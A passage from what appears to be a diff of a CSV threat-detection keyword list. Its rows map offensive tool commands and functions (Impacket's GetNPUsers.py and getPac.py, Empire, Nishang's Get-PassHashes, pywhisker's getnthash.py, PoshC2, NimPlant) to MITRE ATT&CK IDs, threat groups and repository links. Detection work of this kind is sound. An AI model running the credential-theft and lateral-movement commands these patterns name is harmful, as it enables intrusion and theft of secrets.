","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getNimplantByGuid*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*GetNPUsers.py -request*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*GetNPUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*GetNPUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*getnthash.py -key *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*getnthash.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" "*Get-NTLM.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*GetNTLMChallengeBase64*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*getPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*Get-PacketNetBIOSSessionService*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PacketNTLMSSPAuth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PacketNTLMSSPNegotiate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PacketRPCBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PacketRPCRequest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PacketSMB*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-PassHashes*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Get-PassHints*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*get-passnotexp*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get-password-policy.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*Get-PEBasicInfo*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-PacketNetBIOSSessionService*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketNTLMSSPAuth*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketNTLMSSPNegotiate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketRPCBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-PacketRPCRequest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 